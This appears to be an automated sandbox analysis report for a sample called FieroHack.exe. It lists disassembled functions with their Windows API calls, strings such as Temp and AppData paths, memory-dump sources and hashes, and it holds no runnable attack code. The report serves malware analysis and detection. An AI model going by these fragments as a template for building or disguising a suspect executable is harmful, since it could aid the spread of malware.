                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                    • String ID:
                                                    • API String ID: 590372296-0
                                                    • Opcode ID: 72bde667a9f022dbf1faa4afe05fd8607ffa87a39ae1d7f019a30909cdfce6d0
                                                    • Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
                                                    • Opcode Fuzzy Hash: 72bde667a9f022dbf1faa4afe05fd8607ffa87a39ae1d7f019a30909cdfce6d0
                                                    • Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68
                                                    Function 0040460D Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 274stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003FB), ref: 0040465C
                                                    • SetWindowTextA.USER32(00000000,?), ref: 00404686
                                                    • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404742
                                                    • lstrcmpiA.KERNEL32(0042E3C0,0042A890), ref: 00404774
                                                    • lstrcatA.KERNEL32(?,0042E3C0), ref: 00404780
                                                    • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404792
                                                      • Part of subcall function 004057F7: GetDlgItemTextA.USER32(?,?,00000400,004047C9), ref: 0040580A
                                                      • Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\FieroHack.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                      • Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                      • Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\FieroHack.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                      • Part of subcall function 004063D2: CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                    • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B
                                                      • Part of subcall function 004049C4: lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                      • Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
                                                      • Part of subcall function 004049C4: SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                    • String ID: A
                                                    • API String ID: 2624150263-3554254475
                                                    • Opcode ID: 8ddaac7aadbff6108482b2740c9c7be650e0b7f0f0244fb474fb3660dfe90768
                                                    • Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
                                                    • Opcode Fuzzy Hash: 8ddaac7aadbff6108482b2740c9c7be650e0b7f0f0244fb474fb3660dfe90768
                                                    • Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69
                                                    Function 004058BF Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DeleteFileA.KERNEL32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
                                                    • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
                                                    • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
                                                    • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
                                                    • FindFirstFileA.KERNEL32(0042B898,?,?,?,0040A014,?,0042B898,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
                                                    • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
                                                    • FindClose.KERNEL32(00000000), ref: 00405A26
                                                    Strings
                                                    • "C:\Users\user\Desktop\FieroHack.exe", xrefs: 004058BF
                                                    • \*.*, xrefs: 0040592A
                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                    • String ID: "C:\Users\user\Desktop\FieroHack.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                    • API String ID: 2035342205-2759930460
                                                    • Opcode ID: 4def77bb891c7b3960c154a2ad73ead010234d10b8a13dea3fc18deabcd134ba
                                                    • Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
                                                    • Opcode Fuzzy Hash: 4def77bb891c7b3960c154a2ad73ead010234d10b8a13dea3fc18deabcd134ba
                                                    • Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A
                                                    Function 0040216B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                    • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                    Strings
                                                    • C:\Users\user\AppData\Roaming, xrefs: 00402230
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: ByteCharCreateInstanceMultiWide
                                                    • String ID: C:\Users\user\AppData\Roaming
                                                    • API String ID: 123533781-159752144
                                                    • Opcode ID: 163f96e7a228f668ad01f6fff9a08a3bf5921adb224fce9e1f45b383d9424720
                                                    • Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
                                                    • Opcode Fuzzy Hash: 163f96e7a228f668ad01f6fff9a08a3bf5921adb224fce9e1f45b383d9424720
                                                    • Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54
                                                    Function 0040646B Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileA.KERNEL32(74DF3410,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 00406476
                                                    • FindClose.KERNEL32(00000000), ref: 00406482
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2295610775-0
                                                    • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                    • Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
                                                    • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                    • Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC
                                                    Function 004027A1 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: FileFindFirst
                                                    • String ID:
                                                    • API String ID: 1974802433-0
                                                    • Opcode ID: fe0c6c70d9fc1c67409d165531832ab6862d9141dea2be007ff0faa3f611277f
                                                    • Instruction ID: cbd12963852304709d998dbd60bf7e8f33587a64a337c4fd13578998f516bfb3
                                                    • Opcode Fuzzy Hash: fe0c6c70d9fc1c67409d165531832ab6862d9141dea2be007ff0faa3f611277f
                                                    • Instruction Fuzzy Hash: 3EF0A072604110DED711EBA49A49AFEB768AF61314F60457FF112B20C1D7B889469B3A
                                                    Function 00406945 Relevance: .3, Instructions: 334COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                    • Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
                                                    • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                    • Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14
                                                    Function 0040711C Relevance: .3, Instructions: 300COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                    • Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
                                                    • Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                    • Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95
                                                    Function 00404B80 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404B97
                                                    • GetDlgItem.USER32(?,00000408), ref: 00404BA4
                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BF3
                                                    • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404C0A
                                                    • SetWindowLongA.USER32(?,000000FC,00405192), ref: 00404C24
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C36
                                                    • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C4A
                                                    • SendMessageA.USER32(?,00001109,00000002), ref: 00404C60
                                                    • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C6C
                                                    • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C7C
                                                    • DeleteObject.GDI32(00000110), ref: 00404C81
                                                    • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404CAC
                                                    • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404CB8
                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D52
                                                    • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D82
                                                      • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D96
                                                    • GetWindowLongA.USER32(?,000000F0), ref: 00404DC4
                                                    • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404DD2
                                                    • ShowWindow.USER32(?,00000005), ref: 00404DE2
                                                    • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EDD
                                                    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F42
                                                    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F57
                                                    • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F7B
                                                    • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F9B
                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404FB0
                                                    • GlobalFree.KERNEL32(?), ref: 00404FC0
                                                    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405039
                                                    • SendMessageA.USER32(?,00001102,?,?), ref: 004050E2
                                                    • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050F1
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0040511B
                                                    • ShowWindow.USER32(?,00000000), ref: 00405169
                                                    • GetDlgItem.USER32(?,000003FE), ref: 00405174
                                                    • ShowWindow.USER32(00000000), ref: 0040517B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                    • String ID: $M$N
                                                    • API String ID: 2564846305-813528018
                                                    • Opcode ID: 9c9edc283e25dc213d4f824251f13dff68fe0008e79e33de9b0021577515009d
                                                    • Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
                                                    • Opcode Fuzzy Hash: 9c9edc283e25dc213d4f824251f13dff68fe0008e79e33de9b0021577515009d
                                                    • Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58
                                                    Function 00403CA7 Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
                                                    • ShowWindow.USER32(?), ref: 00403D00
                                                    • DestroyWindow.USER32 ref: 00403D14
                                                    • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D30
                                                    • GetDlgItem.USER32(?,?), ref: 00403D51
                                                    • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D65
                                                    • IsWindowEnabled.USER32(00000000), ref: 00403D6C
                                                    • GetDlgItem.USER32(?,00000001), ref: 00403E1A
                                                    • GetDlgItem.USER32(?,00000002), ref: 00403E24
                                                    • SetClassLongA.USER32(?,000000F2,?), ref: 00403E3E
                                                    • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E8F
                                                    • GetDlgItem.USER32(?,00000003), ref: 00403F35
                                                    • ShowWindow.USER32(00000000,?), ref: 00403F56
                                                    • EnableWindow.USER32(?,?), ref: 00403F68
                                                    • EnableWindow.USER32(?,?), ref: 00403F83
                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
                                                    • EnableMenuItem.USER32(00000000), ref: 00403FA0
                                                    • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403FB8
                                                    • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FCB
                                                    • lstrlenA.KERNEL32(0042A890,?,0042A890,00000000), ref: 00403FF5
                                                    • SetWindowTextA.USER32(?,0042A890), ref: 00404004
                                                    • ShowWindow.USER32(?,0000000A), ref: 00404138
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                    • String ID:
                                                    • API String ID: 184305955-0
                                                    • Opcode ID: ed32bf378eed34b85959d54b09fee93901a9971c5acb0b08625fb80f4c2f6060
                                                    • Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
                                                    • Opcode Fuzzy Hash: ed32bf378eed34b85959d54b09fee93901a9971c5acb0b08625fb80f4c2f6060
                                                    • Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D
                                                    Function 004042E6 Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 202windowstringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404371
                                                    • GetDlgItem.USER32(00000000,000003E8), ref: 00404385
                                                    • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004043A3
                                                    • GetSysColor.USER32(?), ref: 004043B4
                                                    • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043C3
                                                    • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043D2
                                                    • lstrlenA.KERNEL32(?), ref: 004043D5
                                                    • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043E4
                                                    • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043F9
                                                    • GetDlgItem.USER32(?,0000040A), ref: 0040445B
                                                    • SendMessageA.USER32(00000000), ref: 0040445E
                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404489
                                                    • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044C9
                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 004044D8
                                                    • SetCursor.USER32(00000000), ref: 004044E1
                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 004044F7
                                                    • SetCursor.USER32(00000000), ref: 004044FA
                                                    • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404526
                                                    • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040453A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                    • String ID: N
                                                    • API String ID: 3103080414-1130791706
                                                    • Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                    • Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
                                                    • Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                    • Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98
                                                    Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                    • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                    • DrawTextA.USER32(00000000,0042EC20,000000FF,00000010,00000820), ref: 00401156
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
